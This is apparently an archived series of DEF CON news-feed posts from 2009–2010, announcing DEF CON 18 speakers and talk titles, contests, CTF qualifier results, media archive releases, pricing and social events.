* App Attack: Surviving the Mobile Application Explosion -- Kevin Mahaffey, John Hering
* Searching for Malware: A Review of Attackers Use of Search Engines to Lure Victims -- Dave Maynor, Dr. Paul Q. Judge
* Getting Social with the Smart Grid -- Justin Morehouse, Tony Flick
* Electronic Weaponry or How to Rule the World While Shopping at Radio Shack -- Timothy "Mage" Otto
* WiMAX Hacking 2010 -- Pierce, Goldy, aSmig
* Industrial Cyber Security -- Wade Polk, Paul Malkewicz, J.Novak
* Improving Antivirus Scanner Accuracy with Hypervisor Based Analysis -- Danny Quist
* Search & Seizure & Golfballs -- Jim Rennie, Eric Rachner
* pyREtic - In-memory Reverse Engineering for Obfuscated Python Bytecode -- Rich Smith
* Stratagem 1 - Deceiving the Heavens to Cross the Sea -- Jayson E. Street
* Breaking WPA-TKIP: Decrypting All Traffic -- Mathy Vanhoef
* Go Go Gadget Python!: Introduction to Hardware Hacking -- Nick Waite, Furkan Cayci
* The Night The Lights Went Out In Vegas: Demystifying Smartmeter Networks -- Barrett Weisshaar, Garret Picchioni
Panels:
* PCI, Compromising Controls and Compromising Security -- Jack Daniel, Joshua Corman, Dave Shackleford, Anton Chuvakin, Martin McKeay, Alex Hutton, James Arlen
* Meet the EFF -- Kurt Opsahl, Eva Galperin, Kevin Bankston, Jennifer Granick, Marcia Hofmann,

==> Voting is Officially Open for the DEF CON 18 Artwork Contest!

https://www.defcon.org/defconrss.xml Here's what you do: go to the DEFCON 17 Artwork Contest Gallery on pics.defcon.org and pick your favorite. Then head on over here and vote in the poll! Good Luck to all the fantastic entries!

==> That's Right.. We're Posting More DC 18 Speakers...

https://www.defcon.org/defconrss.xml Here's a new list of speaker adds. You're probably not even finished absorbing the last one. That's just how we do. Deal with it. Mobile Privacy: Tor on the iPhone and Other Unusual Devices Marco Bonetti, sid77 Who Cares About IPv6? Sam Bowne masSEXploitation Michael Brooks Google Toolbar: The NARC Within Jeff Bryner WRT54-TM, Media Center and Network Sniffer John A. Colley IPv6: No Longer Optional John Curran Function Hooking for Mac OSX and Linux Joe Damato Breaking Bluetooth By Being Bored JP Dunning An Observatory for the SSLiverse Peter Eckersley, Jesse Burns How Unique Is Your Browser? Peter Eckersley Hacker Community (around) the Corporate World - Part II Luiz "effffn" Eduardo Be A Mentor! Marisa Fagen The Anatomy of Drug Testing Jimi Fiekert FOE: The Release of Feed Over Email, a Solution to Feed Controversial News to Censored Countries Sho bleep Exploiting Digital Cameras Oren Isacson, Alfredo Ortega How I Met Your Girlfriend Samy Kamkar Bypassing Smart-card Authentication and Blocking Debiting: Vulnerabilities in Atmel Cryptomemory-based Stored-value Systems Jonathan Lee, Neil Pahl We Don't Need No Stinkin' Badges: Hacking Electronic Door Access Controllers Shawn Merdinger Letting the Air Out of Tire Pressure Monitoring Systems Mike Metzger Open Source Framework for Advanced Intrusion Detection Solutions Patrick Mullen, Ryan Pentney Antique Exploitation (aka Terminator 3: Point One One for Workgroups) Jon Oberheide Build Your Own Security Operations Center for Little or No Money Josh Pyorre Operating System Fingerprinting for Virtual Machines Nguyen Anh Quynh Lord of the Bing: Taking Back Search Engine Hacking from Google and Bing Rob Ragan, Francis Brown Social Networking Special Ops: Extending Data Visualization Tools for Faster Pwnage The Suggmeister Getting Root: Remote Viewing, Non-local Consciousness, Big Picture Hacking, and Knowing Who You Are Richard Thieme INSECURITY ENGINEERING OF PHYSICAL SECURITY SYSTEMS: Locks, Lies, and Videotape Marc Weber Tobias, Tobias Bluzmanis, Matt Fiddler Build Your Own UAV 2.0 - Wireless Mayhem from the Heavens! Michael Weigand, Renderman, Mike Kershaw Crawling BitTorrent DHTs for Fun and Profit Scott Wolchok

==> More Speakers Added to the DEF CON website!

https://www.defcon.org/defconrss.xml DC 18 is getting close and we've added another batch of speakers. Keep tabs on the DEF CON 18 speakers page as we finalize the list. WPA Too! Md Sohail Ahmad Evilgrade, "You Still Have Pending Upgrades?" Francisco Amato Exploitation on ARM - Technique and Bypassing Defense Mechanism Itzhak "Zuk" Avraham Resilient Botnet Command and Control with Tor Dennis Brown Open Public Sensors and Trend Monitoring Daniel Burroughs Bad Memories Elie Bursztein, Baptiste Gourdin, Gustav Rydstedt Kartograph: Finding a Needle in a Haystack or How to Apply Reverse Engineering Techniques to Cheat at Video Games Elie Bursztein, Jocelyn Lagarenne, Dan Boneh Token Kidnapping's Revenge Cesar Cerrudo Hacking Facebook Privacy Chris Conley Physical Security: You're Doing It Wrong! A.P. Delchi Hacking with Hardware: Introducing the Universal RF USB Keyboard Emulation Device - URFUKED Monta Elkins Trolling Reverse-Engineers with Math: Ness... It hurts... frank^2 Mastering the Nmap Scripting Engine Fyodor, David Fifield Live Fire Exercise: Baltic Cyber Shield 2010 Kenneth Geers Making the DEFCON 18 Badge Joe "Kingpin" Grand Legal Developments in Hardware Hacking Jennifer Granick, Matt Zimmerman How To Get Your FBI File (and Other Information You Want From the Federal Government) Marcia Hofmann The Chinese Cyber Army - An Archaeological Study from 2001 to 2010 Wayne Huang, Jack Yu Ripping Media Off Of the Wire HONEY Malware Migrating to Gaming Consoles: Embedded Devices, an AntiVirus-free Safe Hideout for Malware Ahn Ki-Chan, Ha Dong-Joo Training the Next Generation of Hardware Hackers -- Teaching Computer Organization and Assembly Language Hands-on with Embedded Systems Andrew Kongs, Dr. Gerald Kane ChaosVPN for Playing CTFs mc.fly, vyrus, ryd FPGA Bitstream Reverse Engineering Lang Nguyen Kim Jong-il and Me: How to Build a Cyber Army to Defeat the U.S. Charlie Miller Big Brother on the Big Screen: Fact/Fiction? Nicole Ozer, Kevin Bankston Practical Cellphone Spying Chris Paget Extreme-range RFID Tracking Chris Paget My Life As A Spyware Developer Garry Pejski Implementing IPv6 at ARIN Matt Ryanczak Exploiting WebSphere Application Server's JSP Engine Ed Schaller Gaming in the Glass Safe - Games, DRM & Privacy Ferdinand Schober You're Stealing It Wrong! 30 Years of Inter-Pirate Battles Jason Scott Browser Based Defenses James Shewmaker Drivesploit: Circumventing Both Automated AND Manual Drive-by-Download Detection Caleb Sima, Wayne Huang Your ISP and the Government: Best Friends Forever Christopher Soghoian Weaponizing Lady GaGa, Psychosonic Attacks Brad Smith From "No Way" to 0-day: Weaponizing the Unweaponizable Joshua Wise Pwned By The Owner: What Happens When You Steal A Hacker's Computer Zoz

==> DEF CON 18 Contest Madness!

https://www.defcon.org/defconrss.xml Over the past week or two, we've had a flood of announcements for new contests! Check them out below! Dark Tangent's Tamper Evident Contest: There are various tamper evident technologies out there, including tape, seals, locks, tags, and bags, to name a few. This contest will test your ability to perform "defeats" (described below) against a range of inexpensive commercial low to medium security products. Backdoor Hiding Contest: Two-in-one Backdoor Hiding/Finding Contest (participate in either or both). In the first stage, hiding participants provide source code hiding a backdoor; in the second stage, organizers mix the source codes with non-backdoored ones (placebos) and then ask finding participants to spot the placebos. Hiding participants get hiding points for being voted a placebo, and finding participants get points for spotting the placebos and negative points for false positives. KoreLogic's "Crack Me If You Can" Contest: As a part of an authorized penetration test of a large corporate network, you have captured a large number of password hashes. The hashes are from Active Directory, UNIX systems, LDAP servers, routers, etc. As part of your analysis, your client has asked for password complexity statistics, what their users are doing right and/or wrong when generating passwords, and identification of weak passwords. You only have 48 hours to complete this effort.

==> CTF Quals Official Results!

https://www.defcon.org/defconrss.xml Congratulations to the qualifying teams for DEF CON Capture the Flag 2010! Official Quals info is live on ddtek.biz, so check it out for standings, correct and submitted answers by team and much more! Qualified teams: 1. VedaGodz (CONFIRMED!) 2. European Nopsled Team (CONFIRMED!) 3. TwoSixNine (CONFIRMED!) X. Uberminers (deadline expired) 4. lollersk8erz (CONFIRMED!) 5. GoN (CONFIRMED!) 6. painsec (CONFIRMED!) 7. ACME Pharm (CONFIRMED!) 8. Routards (CONFIRMED!) X. Nibbles (CAN'T PARTICIPATE) 9. shellphish (CONFIRMED!) 10. teambfe (CONFIRMED!) alt. Plaid Parliament of Pwning (CONFIRMED!) X. int3pid pandas (CAN'T PARTICIPATE) alt. HackerDom (CONFIRMED!)

==> New Speaker's Corner!

https://www.defcon.org/defconrss.xml Check out the new Speaker's Corner by Shawn Moyer entitled "Kill Yr Idols"!

==> CFP Closes, More Talks Posted!

https://www.defcon.org/defconrss.xml Here's another great batch of talks for DEF CON 18! Stay tuned, we got tons of last minute submissions, so there's a bunch more coming down the pipe in the next couple of weeks! Internet Wars Panel More info to come. Cyber[Crime|War] Charting Dangerous Waters Iftach Ian Amit Seccubus - Analyzing Vulnerability Assessment Data the Easy Way... Frank Breedijk Exploiting SCADA Systems Jeremy Brown Katana: Portable Multi-Boot Security Suite JP Dunning Making the DEF CON 18 Badge Joe "Kingpin" Grand How to Hack Millions of Routers Craig Heffner Powershell...omfg David Kennedy (ReL1K) and Josh Kelley (Winfang) Like a Boss: Attacking JBoss Tyler Krpata Blitzableiter - the Release Felix "FX" Lindner Changing Threats To Privacy: From TIA To Google Moxie Marlinspike Attacking .NET Programs at Runtime Jon McCoy Securing MMOs: A Security Professional's View From the Inside metr0 Wardriving the Smart Grid: Practical Approaches to Attacking Utility Packet Radios Shawn Moyer and Nathan Keltner The Games We Play Brandon Nesbit ExploitSpotting: Locating Vulnerabilities Out of Vendor Patches Automatically Jeongwook Oh Sniper Forensics - One Shot, One Kill Christopher E. Pogue A.K.A "Big Poppa ReverShell" Toolsmithing an IDA Bridge, Case Study For Building a Reverse Engineering Tool Adam Pridgen A New Approach to Forensic Methodology - !!BUSTED!! Case Studies David C. Smith and Samuel Petreski Web Application Fingerprinting with Static Files Patrick Thomas VirGraff101: An Introduction to Virtual Graffiti Tottenkoph An Examination of the Adequacy of the Laws Related to Cyber Warfare Dondi "SpookDoctor06" West

==> Reg Open For Social Engineering Contest!

https://www.defcon.org/defconrss.xml The folks at social-engineer.org have taken the reins of the DEF CON 18 Social Engineering Contest, and registration is open! This promises to be an exciting addition to this year's DEF CON, and has some pretty cool prizes, including an iPad and a spot on the Social Engineer Podcast for 1st place. Check out the contest description and official rules at http://www.social-engineer.org/blog/defcon-social-engineering-contest/.

==> DEF CON 18 CFP Closing Soon!

https://www.defcon.org/defconrss.xml Only a few more days to submit your CFP to speak at DEF CON 18! Call for Papers will officially close Tuesday June 1, so get those submissions in to share your cutting edge hacking research with the world! Check out the official announcement for details, and then fill out the Call for Papers Form.

==> New on defcon.org: CTF Archive and Speaker's Corner!

https://www.defcon.org/defconrss.xml We've got a couple of new sections on defcon.org, the first of which is the Capture The Flag Archive, a page dedicated to collecting accounts, walkthroughs and other resources of Capture the Flag at DEF CON over the years, not only for history's sake but so the uninformed and/or interested can better grasp the epic journey that teams must face on the road to DEF CON CTF victory! We just collected a bunch of the walkthroughs, video, and write-ups from this past weekend's CTF Quals, so check it out! The second new section of defcon.org is called Speaker's Corner, where we will be posting short stories, talk teasers, technical info and words of wisdom from our DEF CON speakers past & present. The first post is by DEF CON 17 Speaker Jayson E. Street, and is entitled "Trying to Be a Wise Man at DEF CON". Thanks to Jayson for being the first to jump onboard! We hope you enjoy these new additions to the site and will help them to grow and be useful to all!

==> Minibosses at theSummit

https://www.defcon.org/defconrss.xml For immediate release: MiniBosses (http://www.minibosses.com/) have signed on as an official act to perform at theSummit on Thursday July 28th during DEF CON. They are the second act to confirm a performance spot at this year's Fundraiser. At ShmooCon in February, DualCore announced that they will return again for this year's event for the 4th consecutive year and 3rd year as the headlining act. Follow Us on Twitter for Event and Feature Guest Updates: www.twitter.com/effsummit Coming to the event? Make your presence known on the Facebook Event Page: http://www.facebook.com/event.php?eid=112161832149640 About Mini Bosses: Four mid-20's guys from Phoenix got together for one common cause... recreate the NES hits you all know and love in real-time on stage for everyone's enjoyment. They consider all Bossies to be their groupies, from the coasts of Tokyo to the midlands of Michigan. If you're into 8-bit power chords, get ready to ride the MIDI wave of Awesome! About EFF: Blending the expertise of lawyers, policy analysts, activists, and technologists, EFF achieves significant victories on behalf of consumers and the general public. EFF fights for freedom primarily in the courts, bringing and defending lawsuits even when that means taking on the US government or large corporations. About Vegas 2.0: A transient, a local or a weekend Vegas Warrior, however you peg us, we are THE Las Vegas InfoSec group. Our members are long time DEF CON and Computer Security Industry avant-garde. When we are not planning theSummit, we spend our free cycles conjuring up Social Engineering, Web and Windows attacks. We are always looking for new locals to Las Vegas OR frequent visitors to stop by our labs conveniently located in North Las Vegas for a beer and some InfoSec foo!

==> Contest & CFP Action Required!

https://www.defcon.org/defconrss.xml The vortex is swirling, folks. There's a sense of urgency in the air; you can't quite put your finger on it, but it's beginning to make you a little nervous and a little excited. Can you feel it nagging the back of your mind? That little voice saying, ever so quietly, "Less than 2 weeks left to submit a talk!", and "CTF Quals reg ends tomorrow!". Or maybe you hear, "write a short story", "figure out LosT's puzzles" or "enter the Art Contest". That voice is actually us reminding you that all of these things are coming up or going on within the next two days to three weeks. So if you want to participate, you better get moving! Keep up on current events, as always, on the DEF CON Twitter, DEF CON Facebook, DEF CON RSS Feed and here on defcon.org!

==> DEF CON 18 Artwork Contest is Open!

https://www.defcon.org/defconrss.xml It's time again, my creative friends, for another year of the DEF CON Artwork Contest! Get out your GIMP or Windows Movie Maker and give a shot at making some awesome DEF CON Artwork! This year we're putting the art contest back in the digital realm. There will be three types of entries, none of which are the standard shirt, sticker, poster designs of the past. This time around we want you to think about themes, desktop wallpapers and animation/motion graphics. You may draw inspiration from past DEF CON art or go in a whole new direction. Check out all the rules at: https://forum.defcon.org/showthread.php?t=11342

==> More DEF CON 18 Speakers!

https://www.defcon.org/defconrss.xml Here's another fresh batch of delicious Speaker goodness for you! Enjoy! Exploiting Internet Surveillance Systems Decius The Search for Perfect Handcuffs... and the Perfect Handcuff Key Deviant Ollam Jackpotting Automated Teller Machines Redux Barnaby Jack The Power of Chinese Security Anthony Lai, Jake Appelbaum and Jon Oberheide Repelling the Wily Insider Matias Madou and Jacob West You Spent All That Money And You Still Got Owned... Joseph McCray Cyberterrorism and the Security of the National Drinking Water Infrastructure John McNabb HD Voice - The Overdue Revolution Doug Mohney DEF CON Security Jam III: Now in 3-D? David Mortman, Rich Mogull, Chris Hoff, Rsnake, Dave Maynor, and Larry Pesce "This Needs To Be Fixed" and Other Jokes In Commit Statements Bruce Potter and Logan Lodge Airport Body Scanners and Possible Countermeasures Paul F. Renda Injecting Electromagnetic Pulses Into The Electric Grid Paul F. Renda SHODAN for Penetration Testers Michael "theprez98" Schearer SMART Project: Applying Reliability Metrics to Security Vulnerabilities Blake Self, Wayne Zage and Dolores Zage Hacking Oracle From Web Apps Sumit "sid" Siddharth So Many Ways to Slap A Yo-bleep:: Xploiting Yoville and Facebook for Fun and Profit strace Attack the Key, Own the Lock Schuyler Towne and datagram Balancing the Pwn Trade Deficit Valsmith, Owner, Colin Ames and Anthony Lai Keep your eyes on the DEF CON 18 Speakers Page and the DEF CON Twitter for new speaker announcements!

==> DEF CON 18 Speakers Posted!

https://www.defcon.org/defconrss.xml Here we go! Here is the first of many batches of DEF CON 18 talks to be posted! Expect more early in the week! FOCA2: The FOCA strikes back Chema Alonso and José Palazón "Palako" Connection String Parameter Attacks Chema Alonso and José Palazón "Palako" SCADA and ICS for Security Experts: How to avoid cyberdouchery James Arlen Web Services We Just Don't Need Mike "mckt" Bailey Our Instrumented Lives: Sensors, Sensors, Everywhere... Greg Conti Cloud Computing, a weapon of mass destruction? David "VideoMan" M. N. Bryan The keys to running a successful DEF CON Group by DC612 David "VideoMan" M. N. Bryan and Jared Bird Programmable HID USB Keystroke Dongle: Using the Teensy as a pen testing device Adrian Crenshaw Constricting the Web: Offensive Python for Web Hackers Nathan Hamiel and Marcin Wielgoszewski Hardware Black Magic: Designing Printed Circuit Boards Dr. Fouad Kiamilev, Corey 'c0re' Lange and Stephen 'afterburn' Janansky DCFluX in: Moon-bouncer Matt "DCFluX" Krick Air Traffic Control Insecurity 2.0 Righter Kunkel "This is not the droid you're looking for..." Nicholas J. Percoco and Christian Papathanasiou Malware Freak Show 2: The Client-Side Boogaloo Nicholas J. Percoco and Jibran Ilyas Build a Lie Detector/Beat a Lie Detector Rain and j03b34r Keep your eyes on the DEF CON 18 Speakers Page and the DEF CON Twitter for new speaker announcements!

==> New DEF CON 18 Site!

https://www.defcon.org/defconrss.xml Check out the new site for DEF CON 18! It's got the most basic info for now, so keep your eyes peeled as all of the great talks, contests and events solidify! You can expect the first round of accepted speakers to be posted very soon! We're also working on a page to guide those new to DEF CON where to look for pertinent information. You will be able find all of the scheduling and entertainment info here as well as it becomes available, so be sure to follow us on the Twitter or Facebook feeds to stay up to the minute as we post new data! Wander around, get familiar, and be sure to check back for frequent updates to the madness that is DEF CON 18!

==> DEF CON 18 Updates

https://www.defcon.org/defconrss.xml Do you hear it? The whir of the gears of DEF CON planning reaching operating speed? All around us events are springing into action! HighWiz has stated his intention to bring back DC101, a primer for those new to attending DEF CON. Not many details yet, but you can stay tuned to DC101 on the DEF CON Forums to stay up to date with details as they become available! We've also noticed that The Summit will be back this year, hosted by Vegas 2.0 to benefit the EFF! You can find details on the Summit Facebook page! We also can't fail to mention recent activity on LosT's Mystery Challenge. He says it's going to be the last year, so you better pay attention if you want to participate! You can follow the Mystery Challenge Forum and the Official Mystery Challenge Site at ten-five-seven.org. There is also a new forums based contest, called "What's in Neil's Pants", wherein Nikita asks a trivia question every week for the chance to win fabulous prizes from the things Neil leaves in his many pockets when he throws his pants in the hamper. You can also look for the DEF CON 18 Website to launch by the end of the month, with an announcement for the DEF CON 18 Artwork Contest to be released in early May! As always, keep your eyes trained on the DEF CON Twitter for updates as they occur!

==> New DEF CON 18 Short Story Contest!

https://www.defcon.org/defconrss.xml This contest is new this year and we are hoping it goes over well. Lots of you out there are avid writers, and some just have an incredible imagination that, when put to paper, blows your mind. Speaking from several years of reviewing white papers and slide decks, you guys are hilarious. We'd like to see your flair for creative writing put to another use and reward you for a (*cough*troll*cough*) job well done. Good Luck! Check out all the details on the Short Story Contest Forum.

==> EFF Proudly Presents the First Annual Defcon Getaway Fundraising Contest!

https://www.defcon.org/defconrss.xml From EFF.org: As the winter snows begin to melt, revealing a landscape full of promise and hope, a hacker's thoughts turn to flights of fancy: specifically, the thought of being in Las Vegas during the last weekend in July. If you're one of those hackers and you love digital freedom, EFF would like your help spreading the word about our efforts to protect and defend coders' rights by encouraging your friends and neighbors to join you in supporting us. In return, EFF wants to help the best EFFvangelists enjoy Defcon 18 in style! Read more...

==> DEF CON 18 Event/Contest Update!

https://www.defcon.org/defconrss.xml Contest and event planning is starting to heat up! A few more have surfaced and some others have begun conversation! Check out your favorite DEF CON Contest or Event link below for more info! 10,000¢ Hacker Pyramid: Call for Help Artwork Contest: Coming in May Badge Hacking Contest: Forum Active Be The Match Foundation - Bone Marrow Drive: NEW! Forum Active Beverage Cooling Contraption Contest: Forum Active Cannonball Run: Forum Active Capture the Flag: Quals Announced DEF CON Shoot: Forum Active Geo Challenge: Forum Active Social Engineering Contest: No Posts Goon Band — Recognize: Forum Active Forum Meet: Forum Active Hacker Jeopardy: Forum Active Hacker Karaoke: Forum Active Hardware Hacking Village: Forum Active Lockpicking Contests: Forum Active Mystery Challenge: Forum Active Official DEF CON DJs, Music, and Events: Call for DJs, Forum Active Open CTF: New Organizers, Forum Active QueerCon: No Posts Scavenger Hunt: Forum Active Spot the Fed: Forum Active Keep your eyes on the DEF CON Twitter, DEF CON Facebook, DEF CON RSS Feed and defcon.org for updates!

==> DEF CON 18 CTF Quals Announced!

https://www.defcon.org/defconrss.xml From the DEF CON Forums: FOR IMMEDIATE RELEASE 1 APRIL 2010 DEFCON CTF QUALIFIER ANNOUNCED Defense Diutinus Technologies Corp (ddtek) is pleased to announce the round of qualification for DEFCON 18 CTF. Stock up on Red Bull, put the pizza delivery on speed dial, polish up your fancy shellcodes, and replenish the duct tape supply. The competition for these coveted spots will be held over 55 non-stop hours 21-24 May. When the dust clears, only the 10 best will be invited to join us this summer in Sin City for the annual DEFCON deathmatch. In historical fashion, VedaGodz will automatically be permitted contest entry. However, we wish to point out that real ninjas would still attempt to qualify. The qualification round will again be in the style of a game board, but answers need not be in the form of a question. Categories will require teams to demonstrate the superiority of hacking across a vast realm of security. This isn't CTF like your mama used to make. Level 1 questions make CISSPs turn red, Level 2 make SANS Fellows cry in frustration, Level 3 are typically only answerable by sheep of above average barnyard intelligence, you get the idea. Pause your Atari emulator and hop over to ddtek.biz to register. Only those that pre-register are permitted to play. Registration site: http://ddtek.biz/register.html Registration opens: 01 Apr 2010 00:00:00 UTC Registration ends: 20 May 2010 00:00:00 UTC Qualifications open: 21 May 2010 19:00:00 UTC Qualifications end: 24 May 2010 02:00:00 UTC More information will follow via your registered email address. Those with SANS certs need not apply. CISSPs are right out.* Vulc@n Difensiva Senior Engineer Diutinus Defense Technologies, Inc.

==> DEF CON 18 Open CTF: DC949 Passes the Torch

https://www.defcon.org/defconrss.xml DC949, the creators of the Open CTF Contest (formerly Amateur CTF), have decided to step down as organizers after five long years. DEF CON would like to thank them for all of their hard work over the last five years in making a contest that was not only fun, but also open to all who'd like to test the waters of Capture the Flag type competition. They have passed the torch to a team that has competed in their contest many times, TubeWarriors. Welcome TubeWarriors, we wish you luck! You can read more in the Open CTF thread on the DEF CON Forums, as well as DC949's Farewell Thread.

==> DEFCON 18 Badge Call-for-Integration

https://www.defcon.org/defconrss.xml With the electronic DEFCON badge now in its fifth incarnation, we've decided to try something different. We're opening our kimono (just slightly) for DEFCON attendees, groups, villages, or contest organizers who want to integrate some piece of information or hide some piece of data in the badge to help further their cause during the con. For example, maybe your contest wants to hide a clue on the badge and then contestants have to find it in the code or press a certain button to reveal it... Read more on the DEF CON Forums. Submissions are due by April 1, 2010.

==> Be The Match Foundation - Bone Marrow Drive @ DEF CON 18

https://www.defcon.org/defconrss.xml As some of you may know, one of our speakers, Thomas Wilhelm, was recently a bone marrow donor through the Be the Match program. He contacted us about setting up a registry drive at Defcon 18. We like that idea and are going to do what we can to make sure they have the space they need in order to grow their donor registry. You can read more on the DEF CON Forums, and keep your eye on that forum for further details as they develop.

==> Want To Be A DJ or Band At DEF CON 18?

https://www.defcon.org/defconrss.xml The Artist Bookings for DEF CON 18 Bands and DJs are currently open! If you are a DJ or a Band that would like to play at the Black and White bleep, by the Pool, in the Chill Out area, or at various other DEF CON events, now is the time to submit your application! DJ Great Scott will be accepting submissions up until May 3rd, 11:59pm (23:59) CST (US Central). You can find his post announcing this on the DEF CON Forums and fill out the application form. Good Luck!

==> Pics from DEF CON 17 on Facebook!

https://www.defcon.org/defconrss.xml Head on over to the Official DEF CON Facebook Fan Page and, if you're not already, become a fan! We've uploaded pictures taken by the official DEF CON 17 photographer, ETA, as well as some pics from Nikita, Dark Tangent, and other Goons who sent them to us. While you're there, start a discussion or leave us a comment, and let us know where your DEF CON pics are!

==> Book your room for DEF CON 18!

https://www.defcon.org/defconrss.xml Get your room for DEF CON 18 booked early on the Riviera Reservation page for DEF CON 18! Rates are $99/night for the first two people! Additional fees may apply for more than 2 people per room.

==> DEF CON 18 Call for Papers is Open!

https://www.defcon.org/defconrss.xml More exciting than the latest 0-day in Acrobat or Internet Exploder, it's time for the DEF CON CFP to open! Check out the DEF CON 18 CFP Announcement for all the details!

==> Confirmed Contest and Events for DEF CON 18!

https://www.defcon.org/defconrss.xml The following Contests and Events have announced their intention to return for DEF CON 18! The ones that already have post activity are marked below. If you have an idea for a new contest or event, you can check out the New Ideas forum and see what kind of response you get! 10,000¢ Hacker Pyramid: No Posts Artwork Contest: No Posts Badge Hacking Contest: No Posts Beverage Cooling Contraption Contest: Forum Active Cannonball Run: No Posts Capture the Flag: No Posts DEF CON Shoot: Forum Active Geo Challenge: No Posts Social Engineering Contest: No Posts Hacker Jeopardy: Forum Active Hacker Karaoke: No Posts Hardware Hacking Village: Forum Active Lockpicking Contests: Forum Active Mystery Challenge: No Posts Official DEF CON DJs, Music, and Events: Call for DJS, Forum Active QueerCon: No Posts Scavenger Hunt: No Posts Spot the Fed:Forum Active We'll post updates as they happen on the DEF CON Twitter, DEF CON RSS Feed and here on the site!

==> DEF CON Archives Complete!

https://www.defcon.org/defconrss.xml DEF CON 9-11 music is now live, with RSS feeds for each. This completes the conversion of the DEF CON Archives for your enjoyment! You can find the RSS feeds at: DEF CON 9 https://www.defcon.org/podcast/defcon-9-music.rss DEF CON 10 https://www.defcon.org/podcast/defcon-10-music.rss DEF CON 11 https://www.defcon.org/podcast/defcon-11-music.rss

==> DEF CON 17 Merch at J!NX

https://www.defcon.org/defconrss.xml Was the swag line at the show too long for you? Just didn't get a chance to pick up a shirt? You can now find all of the remaining DEF CON 17 Merchandise at J!NX! There are even some shirts left over from DEF CON 16. Check it out!

==> DEF CON Archives Nearing Completion!

https://www.defcon.org/defconrss.xml DEF CON 10 and 11 presentation audio and video are now converted and live on their respective archives pages, and we have also posted RSS feeds for each. This makes the presentation archives complete! All that remains is to finish the DEF CON 9-11 Music RSS feeds, and the archives will be whole and up to date! You can find the RSS feeds at: DEF CON 10 https://www.defcon.org/podcast/defcon-10-audio.rss https://www.defcon.org/podcast/defcon-10-video.rss DEF CON 11 https://www.defcon.org/podcast/defcon-11-audio.rss https://www.defcon.org/podcast/defcon-11-video.rss Or check out the DEF CON Media Archives Page! Updates will be posted here on defcon.org, media.defcon.org, and the DEF CON Twitter, so keep watch!

==> Pricing for DEF CON 18

https://www.defcon.org/defconrss.xml As the CPU cycles of DEF CON 18 Planning begin to rise toward 100%, we wanted to inform you that the price of admission will be rising slightly for DEF CON 18 to $140 USD due to price increases in the cost of doing business in Las Vegas and Washington State. The economy is in a slump, but don't tell the tax crazy cities that! I can't afford that, you say? You could offset this modest bump in price if you were to save an extra 10¢ per day from now until con. That's what, one can of Jolt Cola per week? For almost four days of some of the most groundbreaking talks, contests, events and hacker social funtime around? Check the newspaper coin returns, look under your couch cushions, keep your eyes on the ground for change! You'll find that extra $20, and it'll be worth it! We are planning to make DEF CON bigger and better than previous years, with a new "No Drama Badge™" to keep you out of lines and in action. So keep watch on defcon.org and the DEF CON Twitter for news of the surprises we have in store!

==> Happy New Year from DEF CON!

https://www.defcon.org/defconrss.xml As 2009 fades away into the memory backups, we'd like to wish you all happy hacking in 2010! At DEF CON World Domination HQ, we are wrapping up the last of the archiving and moving on to DEF CON 18. We have some new surprises in development to make this year's show even better. So stay tuned to the DEF CON RSS Feed and the DEF CON Twitter for the latest updates as we release past content and announce new events and contests! We'll be opening the DC 18 Call for Papers some time in February, and now is a great time to start thinking about new ideas you may have for DEF CON 18. You can follow and participate in the Planning and New Ideas sections of the DEF CON Forums. Happy New Year to all from the DEF CON Team!

==> DEF CON Archives Pages Up and Running!

https://www.defcon.org/defconrss.xml Gone are the days of the 10 mile deep DEF CON archives page! The new and improved archives pages for DEF CON 1-10 are now all up and running to match the 11-17 archives posted earlier this year. There is still a bit of audio left to transcode, and a few more RSS feeds coming, so keep your eyes on the archives and our twitter feed for those developments as they occur. You can also check out media.defcon.org for the list of the most current updates to the media from past shows.

==> DEF CON HQ Update

https://www.defcon.org/defconrss.xml Hey Hackers, we just wanted to let you know what's going on here at DEF CON World Domination HQ! DT, Nikita and myself are grinding away at the DEF CON Archives working on the bestest New Year's gift ever, filling in the gaps and re-encoding all of the content from all of the past cons! We're also making audio and video RSS feeds for years that don't have them, and trying to pull some SEO magic to make everything ultimately more findable. So, keep your eyes on the DEF CON Archives for all of the great stuff from the past 17 years that you forgot you wanted to know. If you don't already follow, the DEF CON Twitter feed is a great place to get the freshest announcements on what we are doing! By the way, the buzz for DEF CON 18 is already humming on the DEF CON Forums, and a few of the contests have planning threads and announcements open. Now is a great time to start thinking about new ideas that you might want to propose for this year's DEF CON, so post them there if you've got a great new idea!

==> Dark Tangent to Keynote Virtual Event

https://www.defcon.org/defconrss.xml Jeff Moss (Dark Tangent) to keynote Black Hat/Dark Reading virtual event December 9th. Visit https://www.blackhat.com/html/virtual2009/virtual2009-home.html for info.

==> Early Christmas! DEF CON 17 Video and Audio Now Online!

https://www.defcon.org/defconrss.xml That's right kids! Whether you've been naughty or nice, all of the audio and video from DEF CON 17 is now available for download! You can get it by heading to the DEF CON 17 Archive Page, and check out all of the awesome talks you want. You can also get them straight from the iTunes store or from the following RSS Feeds:
* Speaker & Slides contains video of the speaker and their slides.
* Slides contains video of the slides with speaker audio.
* Audio for those who just want to listen.
We're also considering posting them soon for one massive download over torrent and peer to peer, so stay tuned, and enjoy!!

==> Re-encoded Past DEFCON Content!

https://www.defcon.org/defconrss.xml Dark Tangent has been busy this past weekend, re-encoding the Audio from DEFCON 1 through 6 into iPod friendly m4b format! While he was at it, he decided to also re-encode the Hacker Documentaries in the archives to m4v format for your viewing pleasure! The audio from 1-6 can also be downloaded straight from iTunes! Also check out media.defcon.org for peer-to-peer links and links to all of the past media we're working on!
DEFCON 1 Audio Links | DEFCON 1 Audio RSS
DEFCON 2 Audio Links | DEFCON 2 Audio RSS
DEFCON 3 Audio Links | DEFCON 3 Audio RSS
DEFCON 4 Audio Links | DEFCON 4 Audio RSS
DEFCON 5 Audio Links | DEFCON 5 Audio RSS
DEFCON 6 Audio Links | DEFCON 6 Audio RSS
Re-encoded Hacker Documentaries:
Hacker Documentary - 1994 - Unauthorized Access by Annaliza Savage
Hacker Documentary - 1995 - Hackers 95 by Phon-E and R.F. Burns
Hacker Documentary - 1997 - Hacks by Christine Bader
Hacker Documentary - 2000 - Commodore 64 Cracks by Iron Feather

==> DJ Event Videos from DEFCON 17!

https://www.defcon.org/defconrss.xml For your visual and auditory pleasure, check out the following videos of the fantastic sets recorded from some of the DJ Events at DEFCON 17! Special thanks to Liquid8or for recording and providing these videos! Download and enjoy!
Corrupt Data DJ Njntrubl - End of BW Ball
DJ Felix 1 - Pool Party
DJ Felix 2 - Pool Party
DJ Felix Mix
DJ Great Scott 1 - BW Ball
